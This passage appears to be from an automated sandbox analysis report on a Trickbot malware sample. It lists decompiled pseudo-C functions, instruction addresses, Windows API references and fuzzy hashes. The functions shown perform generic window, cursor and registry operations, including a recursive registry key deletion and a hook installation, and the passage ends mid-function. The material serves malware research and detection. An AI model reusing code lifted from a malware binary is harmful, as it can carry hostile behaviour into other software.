										L11:
										_t46 = 0;
									} else {
										_t42 = E0041B66F(_t64 - 0x74) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E0041BD70(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x58) = 0;
				_t31 = E00418EC0(_t64 - 0x74);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}

0x0041aef4
0x0041af03
0x0041af06
0x0041af0e
0x0041af18
0x0041af21
0x0041af25
0x0041af2c
0x0041af2d
0x0041af39
0x0041af3f
0x0041af40
0x0041af4a
0x0041af76
0x0041af78
0x0041af7d
0x0041af92
0x0041afb3
0x0041afb3
0x0041af94
0x0041af9c
0x0041afa2
0x00000000
0x00000000
0x0041afa2
0x0041af92
0x0041afbc
0x0041afbc
0x0041af76
0x0041afca
0x0041afcc
0x0041afd4
0x0041afd5
0x0041afdc
0x0041afdf
0x0041afe9
0x0041aff1

APIs

__EH_prolog.LIBCMT ref: 0041AEF4
GetTopWindow.USER32(?), ref: 0041AF1B
GetDlgCtrlID.USER32(00000000), ref: 0041AF30
SendMessageA.USER32(?,00000087,00000000,00000000), ref: 0041AF89
GetWindow.USER32(00000000,00000002), ref: 0041AFC4

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: a593015c0eee3eda3723142677cb0135c8808f5a6603c7bfcdee23bcedffa600
Instruction ID: 1c3770068c8ded4160964aefbec3f80526a3820df74741eddc999ae44012b762
Opcode Fuzzy Hash: a593015c0eee3eda3723142677cb0135c8808f5a6603c7bfcdee23bcedffa600
Instruction Fuzzy Hash: 7931D671801104AECB25EBB5C9899EFBB75EF54300F20022FF411A3251EB784D86CA59

Uniqueness

Uniqueness Score: -1.00%

Function 00415D5B, Relevance: 7.6, APIs: 5, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00415D5B(intOrPtr __ecx) {
				void* __esi;
				struct HWND__* _t40;
				void* _t42;
				void* _t50;
				intOrPtr _t63;
				signed int _t66;
				void* _t83;

				_t63 = __ecx;
				E00405340(E004386A0, _t83);
				_push(__ecx);
				_push(__ecx);
				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
					L9:
					E00417F36( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
				} else {
					_t40 =  *(__ecx + 0x1c);
					if(_t40 == 0) {
						goto L9;
					} else {
						_t66 =  *0x447478; // 0x44748c
						 *(_t83 - 0x10) = _t66;
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						_t42 = E0041884D(_t83, GetParent(_t40));
						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E004181F7(_t83 - 0x10, _t83, 0x104)) >= 0) {
							E00418246(_t83 - 0x10, __eflags, 0xffffffff);
						} else {
							E00417E53(_t83 - 0x10, 0x104);
						}
						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
							L8:
							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
							E00417EC8(_t83 - 0x10);
							_t63 =  *((intOrPtr*)(_t83 - 0x14));
							goto L9;
						} else {
							_t50 = E0041884D(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E004181F7(_t83 - 0x10, _t83, 0x104)) >= 0) {
								E00418246(_t83 - 0x10, __eflags, 0xffffffff);
								E00417C3D( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
								E00417EC8(_t83 - 0x10);
							} else {
								E00417E53(_t83 - 0x10, 0x104);
								goto L8;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return  *((intOrPtr*)(_t83 + 8));
			}

0x00415d5b
0x00415d60
0x00415d65
0x00415d66
0x00415d67
0x00415d75
0x00415d78
0x00415e28
0x00415e2e
0x00415d7e
0x00415d7e
0x00415d83
0x00000000
0x00415d89
0x00415d89
0x00415d8f
0x00415d98
0x00415da0
0x00415dc9
0x00415dda
0x00415dcb
0x00415dce
0x00415dce
0x00415de6
0x00415e19
0x00415e19
0x00415e20
0x00415e25
0x00000000
0x00415de8
0x00415df1
0x00415e0f
0x00415e4c
0x00415e58
0x00415e5d
0x00415e64
0x00415e11
0x00415e14
0x00000000
0x00415e14
0x00415e0f
0x00415de6
0x00415d83
0x00415e3c
0x00415e44

APIs

__EH_prolog.LIBCMT ref: 00415D60
GetParent.USER32(?), ref: 00415D9D
SendMessageA.USER32(?,00000464,00000104,00000000), ref: 00415DC5
GetParent.USER32(?), ref: 00415DEE
SendMessageA.USER32(?,00000465,00000104,00000000), ref: 00415E0B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageParentSend$H_prolog
String ID:
API String ID: 1056721960-0
Opcode ID: df82b3c2bade386fb388a6cf614eb157c91b489a35e5a7e5095544e2ed3c16c8
Instruction ID: a5d62ff2afa0c0fb4621ae06678bc6a3fb75691d3dca1708136b54179eb94b7a
Opcode Fuzzy Hash: df82b3c2bade386fb388a6cf614eb157c91b489a35e5a7e5095544e2ed3c16c8
Instruction Fuzzy Hash: 67316F7190061AEBCB14EFA5CC85EEEB774EF44328F10452EB421A71D1DB389E85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00410D00, Relevance: 7.6, APIs: 5, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410D00(signed int _a8) {
				intOrPtr _v0;
				signed int _t28;
				struct HINSTANCE__* _t29;
				struct HHOOK__* _t30;
				signed int _t31;
				signed int _t33;
				signed int _t40;
				signed int _t42;
				signed int _t44;
				intOrPtr* _t45;
				signed int _t46;
				long _t48;
				signed int _t50;

				if( *0x44d360 >= 0x30a) {
					__eflags =  *0x44d340;
					if( *0x44d340 != 0) {
						_t50 = _a8 | 0x00000001;
						__eflags = _t50 & 0x00000002;
						if((_t50 & 0x00000002) != 0) {
							_t50 = _t50 & 0xfffffffc;
							__eflags = _t50;
						}
						EnterCriticalSection(0x44d320);
						__eflags =  *0x44d39c - 0x80;
						if( *0x44d39c == 0x80) {
							L15:
							LeaveCriticalSection(0x44d320);
							__eflags = 0;
							return 0;
						} else {
							_t48 = GetCurrentThreadId();
							_t28 = 0;
							__eflags =  *0x44d39c - _t28; // 0x0
							if(__eflags <= 0) {
								L11:
								_t29 =  *0x44d35c; // 0x0
								_t30 = SetWindowsHookExA(5, E00411E60, _t29, _t48);
								__eflags = _t30;
								if(_t30 == 0) {
									goto L15;
								} else {
									_t46 =  *0x44d39c; // 0x0
									 *((intOrPtr*)((_t46 << 2) + 0x44d3a0 + (_t46 << 2) * 4)) = _v0;
									_t40 =  *0x44d39c; // 0x0
									 *((_t40 << 2) + 0x44d3a4 + (_t40 << 2) * 4) = _t48;
									_t42 =  *0x44d39c; // 0x0
									 *((_t42 << 2) + 0x44d3a8 + (_t42 << 2) * 4) = _t30;
									_t31 =  *0x44d39c; // 0x0
									 *((intOrPtr*)((_t31 << 2) + 0x44d3ac + (_t31 << 2) * 4)) = 1;
									_t33 =  *0x44d39c; // 0x0
									 *((_t33 << 2) + 0x44d3b0 + (_t33 << 2) * 4) = _t50;
									_t44 =  *0x44d39c; // 0x0
									 *0x44d394 = _t48;
									 *0x44d398 = _t44;
									 *0x44d39c =  *0x44d39c + 1;
									__eflags =  *0x44d39c;
									goto L13;
								}
							} else {
								_t45 = 0x44d3a4;
								while(1) {
									__eflags =  *_t45 - _t48;
									if( *_t45 == _t48) {
										break;
									}
									_t45 = _t45 + 0x14;
									_t28 = _t28 + 1;
									__eflags = _t28 -  *0x44d39c; // 0x0
									if(__eflags < 0) {
										continue;
									} else {
										goto L11;
									}
									goto L16;
								}
								 *((intOrPtr*)((_t28 << 2) + 0x44d3ac + _t36 * 4)) =  *((intOrPtr*)((_t28 << 2) + 0x44d3ac + _t36 * 4)) + 1;
								L13:
								LeaveCriticalSection(0x44d320);
								return 1;
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
				L16:
			}

0x00410d0b
0x00410d14
0x00410d1b
0x00410d28
0x00410d2b
0x00410d31
0x00410d33
0x00410d33
0x00410d33
0x00410d3b
0x00410d41
0x00410d4b
0x00410e27
0x00410e2c
0x00410e32
0x00410e36
0x00410d51
0x00410d57
0x00410d59
0x00410d5b
0x00410d61
0x00410d7c
0x00410d7d
0x00410d8a
0x00410d90
0x00410d92
0x00000000
0x00410d98
0x00410d98
0x00410da5
0x00410dac
0x00410db5
0x00410dbc
0x00410dc5
0x00410dcc
0x00410dd4
0x00410ddf
0x00410de7
0x00410dee
0x00410df4
0x00410dfa
0x00410e00
0x00410e00
0x00000000
0x00410e00
0x00410d63
0x00410d63
0x00410d68
0x00410d68
0x00410d6a
0x00000000
0x00000000
0x00410d70
0x00410d73
0x00410d74
0x00410d7a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00410d7a
0x00410e1e
0x00410e06
0x00410e0b
0x00410e18
0x00410e18
0x00410d61
0x00410d1d
0x00410d1d
0x00410d21
0x00410d21
0x00410d0d
0x00410d11
0x00410d11
0x00000000

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e794baa36fe8a4bb6ef4bedb02aba52e2c7310ff4c35b23995d853e79a78d7
Instruction ID: c1136f55217e1c2a046085af44c6ec960e6274cae466e8b29d1a5754861e3a3d
Opcode Fuzzy Hash: 03e794baa36fe8a4bb6ef4bedb02aba52e2c7310ff4c35b23995d853e79a78d7
Instruction Fuzzy Hash: 3D3188B9F102109FD320DF5CF809A6277E0FB81B15B10857AED4A87665C7B85885CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00426599, Relevance: 7.6, APIs: 5, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00426599(void* __esi, void* __eflags) {
				intOrPtr _v0;
				void* __ebp;
				intOrPtr _t4;
				struct HICON__* _t5;
				void* _t9;
				struct HICON__* _t12;
				signed short _t14;
				void* _t15;
				CHAR* _t18;

				_t15 = __esi;
				E004330FA(9);
				_t4 = _v0;
				if(_t4 == 1 || _t4 >= 0x65 && _t4 <= 0x73) {
					_t14 = 0x7905;
					_t18 = 0x7f85;
					goto L13;
				} else {
					if(_t4 == 2 || _t4 >= 0xc9 && _t4 <= 0xd7) {
						_t14 = 0x7904;
						_t18 = 0x7f84;
						goto L13;
					} else {
						if(_t4 == 3 || _t4 >= 0x12d && _t4 <= 0x20d) {
							_t14 = 0x7903;
							_t18 = 0x7f86;
							L13:
							_t12 = 0;
							__eflags = _t14 -  *0x44b2d0; // 0x0
							if(__eflags == 0) {
								_t5 =  *0x44b2d8; // 0x0
							} else {
								_push(_t15);
								_t9 = E00432562();
								_t12 =  *0x44b2d4; // 0x0
								_t5 = LoadCursorA( *(_t9 + 0xc), _t14 & 0x0000ffff);
								__eflags = _t5;
								 *0x44b2d8 = _t5;
								 *0x44b2d4 = _t5;
								if(_t5 == 0) {
									_t5 = LoadCursorA(_t5, _t18);
									 *0x44b2d8 = _t5;
								}
								 *0x44b2d0 = _t14;
							}
							SetCursor(_t5);
							__eflags = _t12;
							if(_t12 != 0) {
								DestroyIcon(_t12);
							}
							goto L20;
						} else {
							SetCursor( *0x44b338);
							L20:
							return E0043316A(9);
						}
					}
				}
			}

0x00426599
0x0042659e
0x004265a3
0x004265aa
0x00426602
0x00426607
0x00000000
0x004265b6
0x004265b9
0x004265f6
0x004265fb
0x00000000
0x004265c9
0x004265cc
0x004265ea
0x004265ef
0x0042660c
0x0042660c
0x0042660e
0x00426614
0x00426652
0x00426616
0x00426616
0x00426617
0x00426625
0x00426630
0x00426632
0x00426634
0x00426639
0x0042663e
0x00426642
0x00426644
0x00426644
0x00426649
0x0042664f
0x00426658
0x0042665e
0x00426660
0x00426663
0x00426663
0x00000000
0x004265dc
0x004265e2
0x00426669
0x00426673
0x00426673
0x004265cc
0x004265b9

APIs

Part of subcall function 004330FA: EnterCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433135
Part of subcall function 004330FA: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433147
Part of subcall function 004330FA: LeaveCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433150
Part of subcall function 004330FA: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011), ref: 00433162

SetCursor.USER32(00000009), ref: 004265E2
LoadCursorA.USER32(?), ref: 00426630
LoadCursorA.USER32(00000000,00007F85), ref: 00426642
SetCursor.USER32(00000000), ref: 00426658
DestroyIcon.USER32(00000000), ref: 00426663

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalCursorSection$EnterLoad$DestroyIconInitializeLeave
String ID:
API String ID: 4129732340-0
Opcode ID: d4f41a56feee133f44633a5163dd98598048a58c3b12695e6096929197b75f75
Instruction ID: a0ce1a54e8a70548ad507ab5e5c62456ab7a962ed634c046a85497f02c770874
Opcode Fuzzy Hash: d4f41a56feee133f44633a5163dd98598048a58c3b12695e6096929197b75f75
Instruction Fuzzy Hash: 1A11B1B5B04224ABD7209B65FC89A2B379CF742304F66143BE505C72A1C7BCDC818B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1F0, Relevance: 7.6, APIs: 5, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041A1F0(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t21;
				struct HWND__* _t22;
				struct HWND__* _t41;
				void* _t42;
				intOrPtr* _t43;

				_t42 = __ecx;
				_t21 = IsWindowVisible( *(__ecx + 0x1c));
				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t42 + 0x1c));
					while(1) {
						_t22 = GetWindow();
						_t41 = _t22;
						if(_t41 == 0) {
							goto L7;
						}
						GetWindowRect(_t41,  &_v20);
						E0042147E(_t42,  &_v20);
						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t41);
					}
				}
				L7:
				_t43 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t43 != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
				}
				return _t22;
			}

0x0041a1f8
0x0041a1fe
0x0041a206
0x0041a26f
0x0041a212
0x0041a218
0x0041a21a
0x0041a21d
0x0041a21d
0x0041a21f
0x0041a223
0x00000000
0x00000000
0x0041a22a
0x0041a236
0x0041a255
0x0041a25b
0x0041a25d
0x0041a25d
0x0041a21d
0x0041a275
0x0041a275
0x0041a27a
0x00000000
0x0041a28c
0x0041a293

APIs

IsWindowVisible.USER32(?), ref: 0041A1FE
GetWindow.USER32(?,00000005), ref: 0041A21D
GetWindowRect.USER32(00000000,?), ref: 0041A22A

Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A23B), ref: 00421492
Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A243), ref: 0042149B

SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 0041A255
ScrollWindow.USER32(?,?,?,?,?), ref: 0041A26F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: 13fbffe0ba96fa4b0df6ccf43a1f1761a05e91dc821f43cd405d82d8b47a8c66
Instruction ID: 9483d244491325737e0f89e911a4ab211bac53ba3474b46da66f853519b6e94c
Opcode Fuzzy Hash: 13fbffe0ba96fa4b0df6ccf43a1f1761a05e91dc821f43cd405d82d8b47a8c66
Instruction Fuzzy Hash: 73216A32201209BFDF219F94DC48EBB7BB9FB48710F04852AF90696360E7759CA1DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00431E2D, Relevance: 7.6, APIs: 5, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00431E2D() {
				signed int _t51;
				void* _t53;

				E00405340(E004382B8, _t53);
				_t51 = RegOpenKeyA( *(_t53 + 8),  *( *(_t53 + 0xc)), _t53 - 0x14);
				if(_t51 != 0) {
					L8:
					RegCloseKey( *(_t53 - 0x14));
					 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
					return _t51;
				}
				_push(0xff);
				_push(_t53 - 0x118);
				_push(_t51);
				_push( *(_t53 - 0x14));
				while(1) {
					_t51 = RegEnumKeyA();
					if(_t51 != 0) {
						break;
					}
					E00417F36(_t53 - 0x18, _t53, _t53 - 0x118);
					 *(_t53 - 4) =  *(_t53 - 4) & _t51;
					_push(_t53 - 0x18);
					_push( *(_t53 - 0x14));
					_t51 = E00431E2D();
					 *((char*)(_t53 - 0xd)) = _t51 != 0;
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E00417EC8(_t53 - 0x18);
					if( *((char*)(_t53 - 0xd)) != 0) {
						break;
					}
					_push(0xff);
					_push(_t53 - 0x118);
					_push(0);
					_push( *(_t53 - 0x14));
				}
				if(_t51 == 0x103 || _t51 == 0x3f2) {
					_t51 = RegDeleteKeyA( *(_t53 + 8),  *( *(_t53 + 0xc)));
				}
				goto L8;
			}

0x00431e32
0x00431e51
0x00431e55
0x00431ee5
0x00431ee8
0x00431ef4
0x00431efc
0x00431efc
0x00431e6e
0x00431e6f
0x00431e70
0x00431e71
0x00431e74
0x00431e76
0x00431e7a
0x00000000
0x00000000
0x00431e86
0x00431e8b
0x00431e91
0x00431e92
0x00431e9a
0x00431ea1
0x00431ea5
0x00431ea9
0x00431eb2
0x00000000
0x00000000
0x00431eba
0x00431ebb
0x00431ebc
0x00431ebe
0x00431ebe
0x00431ecb
0x00431ee3
0x00431ee3
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00431E32
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00431E4B
RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 00431E74
RegDeleteKeyA.ADVAPI32(?,?), ref: 00431EDD
RegCloseKey.ADVAPI32(?), ref: 00431EE8

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CloseDeleteEnumH_prologOpen
String ID:
API String ID: 3131381098-0
Opcode ID: 99e0d6c8b4b06a4ae5ccdd42ff655907d40d4397027c52b52596e22001da34e7
Instruction ID: d8f1759deb82bb677c20337d83348239347245c2dc8dc760b821530747de5b27
Opcode Fuzzy Hash: 99e0d6c8b4b06a4ae5ccdd42ff655907d40d4397027c52b52596e22001da34e7
Instruction Fuzzy Hash: 62215E72C0012AABDF25DB94CC42AEFBBB8EF08350F005166FD55A72A0D7359E41DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042D2A8, Relevance: 7.6, APIs: 5, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042D2A8(intOrPtr* __ecx, void* __ebp, signed int _a4) {
				void* _t21;
				signed char _t22;
				signed int _t40;
				intOrPtr* _t44;
				void* _t45;
				struct HWND__* _t47;

				_t45 = __ebp;
				_t40 = _a4;
				_t44 = __ecx;
				if(_t40 != 0 && ( *(__ecx + 0x24) & 0x00000004) != 0) {
					E0041B815(__ecx, 0);
					return SetFocus(0);
				}
				_t21 = E0041884D(_t45, GetParent( *(_t44 + 0x1c)));
				if(_t21 != 0) {
					return _t21;
				} else {
					if(_t40 != 0) {
						_t22 =  *(_t44 + 0x24);
						_push(_t45);
						if((_t22 & 0x00000080) != 0) {
							 *(_t44 + 0x24) = _t22 & 0x0000007f;
							 *((intOrPtr*)( *_t44 + 0x8c))();
							_t47 =  *(_t44 + 0x1c);
							if(GetActiveWindow() == _t47) {
								SendMessageA(_t47, 6, 1, 0);
							}
						}
						if(( *(_t44 + 0x24) & 0x00000020) != 0) {
							SendMessageA( *(_t44 + 0x1c), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t44 + 0xa0)) == 0) {
							 *(_t44 + 0x24) =  *(_t44 + 0x24) | 0x00000080;
							 *((intOrPtr*)( *_t44 + 0x88))();
						}
					}
					asm("sbb edi, edi");
					return E0042D35E(_t44, ( ~_t40 & 0xfffffff0) + 0x20);
				}
			}

0x0042d2a8
0x0042d2ab
0x0042d2b1
0x0042d2b5
0x0042d2be
0x00000000
0x0042d2c4
0x0042d2d9
0x0042d2e0
0x0042d35b
0x0042d2e2
0x0042d2e4
0x0042d2fe
0x0042d309
0x0042d30a
0x0042d310
0x0042d315
0x0042d31b
0x0042d326
0x0042d32f
0x0042d32f
0x0042d326
0x0042d336
0x0042d344
0x0042d344
0x0042d2e6
0x0042d2ec
0x0042d2f0
0x0042d2f6
0x0042d2f6
0x0042d2ec
0x0042d348
0x00000000
0x0042d353

APIs

SetFocus.USER32(00000000), ref: 0042D2C4
GetParent.USER32(?), ref: 0042D2D2
GetActiveWindow.USER32 ref: 0042D31E
SendMessageA.USER32(?,00000006,00000001,00000000), ref: 0042D32F
SendMessageA.USER32(?,00000086,00000001,00000000), ref: 0042D344

Part of subcall function 0041B815: EnableWindow.USER32(?,?), ref: 0041B823

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSendWindow$ActiveEnableFocusParent
String ID:
API String ID: 3951091596-0
Opcode ID: 01b81ee88ece0940d13ea7f2b6d1eb7395b04c4b6aee473bc05e107433d5950f
Instruction ID: 94b69f3912c84586d63b5872b0baf25ae8cfe2dd040671f2ff7e944a02e93575
Opcode Fuzzy Hash: 01b81ee88ece0940d13ea7f2b6d1eb7395b04c4b6aee473bc05e107433d5950f
Instruction Fuzzy Hash: 411129327017109BD730AF65EC88B5B77E9AF54714F54062EF986962D1CB78AC40C71D

Uniqueness

Uniqueness Score: -1.00%

Function 0042D35E, Relevance: 7.6, APIs: 5, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0042D35E(void* __ecx, signed int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t32;
				void* _t33;
				struct HWND__* _t34;

				_t33 = __ecx;
				if((E0041B66F(__ecx) & 0x40000000) == 0) {
					_t32 = E00419EDA(__ecx);
				} else {
					_t32 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E0041B7FA(_t32);
					if(( !_a4 & 0x00000008) == 0 || _t23 == 0 || _t32 == _t33) {
						SendMessageA( *(_t32 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t33 + 0x25) =  *(_t33 + 0x25) | 0x00000002;
						SendMessageA( *(_t32 + 0x1c), 0x86, 1, 0);
						 *(_t33 + 0x25) =  *(_t33 + 0x25) & 0x000000fd;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t34 = _t20;
					if(_t34 == 0) {
						break;
					}
					if(E0042D065( *(_t32 + 0x1c), _t34) != 0) {
						SendMessageA(_t34, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t34);
				}
				return _t20;
			}

0x0042d362
0x0042d36e
0x0042d37b
0x0042d370
0x0042d370
0x0042d370
0x0042d388
0x0042d38c
0x0042d39a
0x0042d3c8
0x0042d3a4
0x0042d3a4
0x0042d3b4
0x0042d3b6
0x0042d3b6
0x0042d39a
0x0042d3ca
0x0042d3d8
0x0042d3d9
0x0042d3d9
0x0042d3db
0x0042d3df
0x00000000
0x00000000
0x0042d3ec
0x0042d3fa
0x0042d3fa
0x0042d3fc
0x0042d3fe
0x0042d3fe
0x0042d405

APIs

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

SendMessageA.USER32(?,00000086,00000001,00000000), ref: 0042D3B4
SendMessageA.USER32(?,00000086,00000000,00000000), ref: 0042D3C8
GetDesktopWindow.USER32 ref: 0042D3CC
GetWindow.USER32(00000000), ref: 0042D3D9
SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 0042D3FA

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 2beb82650e845792c7a9482f3e3f64514614eb6d422ef827a1529e378b278088
Instruction ID: a1949cff4a9723ce3053a319633721de6bac2869e42685dadae143a23d4e7120
Opcode Fuzzy Hash: 2beb82650e845792c7a9482f3e3f64514614eb6d422ef827a1529e378b278088
Instruction Fuzzy Hash: 4A118C31B4072573E732DA25FC06F6F7A459F41750F44411AFA415A2D1CF99DC4282AF

Uniqueness

Uniqueness Score: -1.00%

Function 00433344, Relevance: 7.6, APIs: 5, Instructions: 63
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00433344(void* __eflags, void* _a4) {
				char _v268;
				signed char* _t8;
				void* _t10;
				void* _t22;
